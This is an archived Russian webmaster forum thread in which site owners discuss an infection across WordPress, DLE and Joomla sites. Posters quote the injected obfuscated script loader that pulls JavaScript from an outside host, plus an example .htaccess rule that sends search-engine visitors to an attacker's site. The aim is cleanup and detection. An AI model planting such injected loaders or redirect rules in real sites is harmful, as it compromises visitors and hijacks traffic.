PDA

Просмотр полной версии : Вирус site content security


ais9
06.06.2013, 09:58
Всем привет
Прошу помощи.
Куда рыть уже и не знаю весь сайт переполошил

Возникает фрем, на всех сайтах на площадке и самое интересное что если ты пишешь напрямую и заходишь то фрейма нет и если из самой поисковой системы то он появляется

ais9
06.06.2013, 12:39
Нашёл

Если вдруг у кого будет

вот этот код

'%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%
72%65%76%69%65%77%68%6F%61%78%2E%63%6F%6D%2F%77%70%2D%69%
6E%63%6C%75%64%65%73%2F%70%6F%6D%6F%2F%2E%62%61%63%6B%75%
70%2F%2E%73%63%72%69%70%74%2E%6A%73%20%74%79%70%65%3D%74%
65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%3E%3C%2F%73%63%
72%69%70%74%3E'));

maximka77
06.06.2013, 15:07
В таком случае хотя бы указывайте в каком файле нашли. Возможно другим когда-нибудь пригодится.

ais9
07.06.2013, 13:57
Файлы все разные были заражены, заражает WP, DLE, Joomla
Проще всего найти по ssh там уже поиском команды это вводите и он уже покажет какие фалы содержат данную гадость

Greys soul
07.06.2013, 18:39
У меня на джумле такой вирус. кроме ssh как найти??????

atranca
07.06.2013, 21:57
Нашёл

Если вдруг у кого будет

вот этот код

'%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%
72%65%76%69%65%77%68%6F%61%78%2E%63%6F%6D%2F%77%70%2D%69%
6E%63%6C%75%64%65%73%2F%70%6F%6D%6F%2F%2E%62%61%63%6B%75%
70%2F%2E%73%63%72%69%70%74%2E%6A%73%20%74%79%70%65%3D%74%
65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%3E%3C%2F%73%63%
72%69%70%74%3E'));
т е ты этот код удалил а заразу оставил?

Это если перевести на человеческий язык то что ты выложил

<script src=http://eviewhoax.com/wp-icludes/pomo/.backup.script.js type=txt/javascript></script>

(не удивлюсь если сайт eviewhoax.com- твой)

ну а сам скрипт перенаправления обычно зашит в хтасес

и имеет примерно такой вид

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://sait_zlodeya [L,R]
</IfModule>

т е если зайдеш напрямую- показывается твой сайт, если через рефер (включая поисковики) то сайт злодея.

Greys soul
08.06.2013, 10:43
ну а сам скрипт перенаправления обычно зашит в хтасес
atranca, atranca, хм, у себя смотрел нету(
как можно поискать???

ais9
10.06.2013, 09:32
atranca, нет сайт не мой.
Greys soul, можно скачать весь сайт на комп и потом уже через виндовс командер искать по тексту там смотреть внутри файлов где искать, но он сё равно появится надо искать причину, скорее всего из какотого друго дырявого сайта идёт утечка. У меня было именно так на всё хостинге 15 сайтов с разными cms были заражены и появлялись спустя 30мин -1 час пока не удалил пару других новых сайтов которые залил и после этого код не появлялся.
Так же советую на WP и DLe поставить модули контроля изменения файлов, на joomla ещё такой модуль не нашёл
хтасес его нет там и неищите

Прикол в нём такой был, когда ты заходишь на сайт по прямому адресу то ничего не происходит, но если ты зашёл из поисковой системы то сразу же выходит фрейм с предложением ввести телефонный номер и ничего не сделаешь
сам код находился в разных файлах.

полный вид у него такой


document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%
3D%68%74%74%70%3A%2F%2F%72%65%76%69%65%77%68%6F%61%78
%2E%63%6F%6D%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%
70%6F%6D%6F%2F%2E%62%61%63%6B%75%70%2F%2E%73%63%72%69%
70%74%2E%6A%73%20%74%79%70%65%3D%74%65%78%74%2F%6A%61%
76%61%73%63%72%69%70%74%3E%3C%2F%73%63%72%69%70%74%3E'));

atranca
10.06.2013, 21:25
atranca, atranca, хм, у себя смотрел нету(
как можно поискать???
скачивай айболит- заливай на сайт, следуй инструкциям в текстовике- 90% найдет заразу.
Советую поменять пароли на ФТП (потомучто в последнее время ломают не сайты а троя подсаживают на комп, который тырит сохраненные пассы и уже удаленно по ФТП льют заразу)

kioskanalya
24.06.2013, 22:18
Народ пожалуйста помогите найти его! Точно такой же вирус на сайте http://makler-nedvizhimost.ru/ никак не могу найти! Заранее благодарен!

AllHostings
24.06.2013, 23:26
Если хотите платно - helpist.ru например
Навряд ли просто вытащить этот код поможет.
там уже сидят шелы и будут заражать дальше.